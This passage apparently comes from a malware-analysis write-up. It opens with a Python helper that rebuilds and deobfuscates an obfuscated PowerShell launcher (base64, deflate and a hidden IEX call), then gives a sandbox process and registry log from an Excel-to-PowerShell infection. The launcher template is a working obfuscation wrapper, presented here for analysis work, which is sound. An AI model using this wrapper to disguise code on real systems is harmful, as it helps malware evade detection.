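            '"\\".("\\" +[StrInG][CHAR]34 +"\\"{1}{0}"\\" +[StrInG][CHAR]34 +"\\"-f\'l\''
            + var + '\'sa\') l sal;.(\'l\') t NEw-Object;&(\'l\') k IeX;.(\'k\')(&(\'t\') '
            'Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(('
            '"\\" +[StrInG][CHAR]34 +"\\"')
    tail = ('"\\" +[StrInG][CHAR]34 +"\\" \n-f' + var.join("'%s'" % a for a in args)
            + ')) ' + var + '[iO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) '
            '|.(\'%\'){ &(\'t\') Io.StReamREaDer( `$_' + var + ' [TexT.eNCODINg]::AScii)}'
            '|&(\'%\'){ `$_.READtoeND( )} )"\\" | . ( $PShOme[4]+$PshOME[30]+\'X\')')
    return head + template + tail


SAMPLE_SCRIPT = "Write-Host 'stage two reached'; Start-Sleep -Seconds 1"   # constructed payload

if __name__ == "__main__":
    launcher = build_sample_cmdline(SAMPLE_SCRIPT)
    print("invokes:", resolve_pshome_expr("$PShOme[4]+$PshOME[30]+'X'"))
    print("decoded:", deobfuscate(launcher))
```

To run it against the report's own command line, join the wrapped lines of the CMD field first (the separator `'${P1LJ}'` itself is split across lines in the dump); `deobfuscate` drops line breaks for that reason. The permutation check before inflating is the part worth keeping: a template whose indices are not exactly one use of each chunk means the dump is truncated, and inflating a reassembled prefix fails late with a confusing zlib error.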

PID
2356
CMD
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\pnefnq9q.cmdline"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Indicators
Parent process
POWershelL.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Visual C# Command Line Compiler
Version
8.0.50727.4927 (NetFXspW7.050727-4900)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\csc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\cscomp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\psapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\alink.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorpe.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\apphelp.dll

PID
3364
CMD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESD23D.tmp" "c:\Users\admin\AppData\Local\Temp\CSCD23C.tmp"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Indicators
No indicators
Parent process
csc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft® Resource File To COFF Object Conversion Utility
Version
8.00.50727.4940 (Win7SP1.050727-5400)
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\cvtres.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptbase.dll

Registry activity

Total events
2510
Read events
1686
Write events
795
Delete events
29

Modification events

PID
Process
Operation
Key
Name
Value
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3360
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F683
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
hi
68692000200D0000010000000000000000000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
200D0000A852BB8FF420D50100000000
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
EXCELFiles
1321992215
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992196
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{64CAEE4C-BD0E-4701-B0DA-710F89BCB4BD}
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F422
11F422
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11F683
11F683
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
3360
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
74
3360
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
74
1432
POWershelL.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
764
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
764
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5119
Georgian
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
764
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
764
rundll32.exe
write
